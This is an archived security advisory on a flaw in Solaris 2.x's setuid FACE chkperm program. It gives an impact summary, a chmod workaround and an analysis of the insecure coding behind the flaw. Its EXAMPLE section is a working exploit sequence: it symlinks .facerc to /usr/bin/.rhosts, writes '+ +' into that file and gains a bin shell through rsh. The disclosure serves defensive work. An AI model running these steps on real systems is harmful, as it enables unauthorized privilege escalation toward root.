home *** CD-ROM | disk | FTP | other *** search
-
- Solaris 2.x Vulnerability [/usr/vmsys/bin/chkperm]
-
- Problem: Vulnerabilities in /usr/vmsys/bin/chkperm
- Platform: Solaris 2.4, 2.5, 2.5.1, other System V derived
- systems with the FACE package installed
- Impact: Local users can overwrite bin owned files with
- zero length files. Local users can create world
- writable bin owned files. Account bin can be
- compromised.
- Solution: Remove the suid/sgid bit from the program until
- a patch is available
-
- ------------------------------------------------------------------------
-
- PROBLEM DESCRIPTION
-
- Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package
- called FACE (Framed Access Command Environment) installed. Included in
- the package is a program called chkperm which checks a file to see if
- the user has permission to use the FACE interface. This program is
- installed suid and sgid bin, and is trivially exploitable to
- compromise the bin account. And in Solaris, which installs many/most
- of the system binaries as bin, it may be said that "binliness is next
- to rootliness."
-
- The FACE package comes from System V, and may be available under other
- SYSV based systems. We welcome reports of other vulnerable systems.
-
- This vulnerability is believed to be known to the intruder community.
-
- ------------------------------------------------------------------------
-
- PLATFORMS AFFECTED
-
- Solaris 2.x, possibly other SYSVR4 derived systems. We welcome
- reports of other vulnerable systems.
-
- ------------------------------------------------------------------------
-
- IMPACT
-
- Local user can gain system privileges as bin (root follows shortly)
-
- ------------------------------------------------------------------------
-
- SUGGESTED WORKAROUND
-
- % chmod ug-s /usr/vmsys/bin/chkperm
-
- ------------------------------------------------------------------------
-
- EXAMPLE
-
- % mkdir /tmp/foo
- % mkdir /tmp/foo/lib
- % chmod -R 777 /tmp/foo
- % setenv VMSYS /tmp/foo
- % umask 0000
- % ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
- % /usr/vmsys/bin/chkperm -l -u foo
- % ls -l /usr/bin/.rhosts
- -rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
- % echo "+ +" >> /usr/bin/.rhosts
- % ls -l /usr/bin/.rhosts
- -rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
- % rsh -l bin localhost /bin/csh -i
- Warning: no access to tty; thus no job control in this shell...
- % id
- uid=2(bin) gid=2(bin)
-
- ------------------------------------------------------------------------
-
- DISCUSSION
-
- The program (which resides at /usr/vmsys/bin/chkperm) does several
- things in an insecure fashion:
-
- 1) It tries to open the file $VMSYS/.facerc and if the file is not
- present it creates it, with zero length, ownership bin.bin
-
- 2) The user's UMASK is inherited, so permissions on the newly-created
- .facerc are under the control of an attacker.
-
- 3) VMSYS by default is set to /usr/lib, but the program cheerfully
- checks your environment for a different VMSYS base directory, and
- uses that.
-
- 4) There is no check made for symbolic links, avoiding the need to
- race.
-
- This exploit is far from original, though it appears to be unpublished
- as yet. Blindly following symlinks, following without checking for
- existence or matching ownership, inheriting the user's environment,
- are examples of very naive programming wholly inappropriate for a
- program installed setuid to a system account.
-
- Sun's practice of shipping their system binaries and binaries
- directories owned and writable by bin certainly contributes to making
- this exposure more effective and dangerous.
-
- Kevin Prigge <klp@tc.umn.edu>
- John Ladwig <jladwig@soils.umn.edu>
-
-
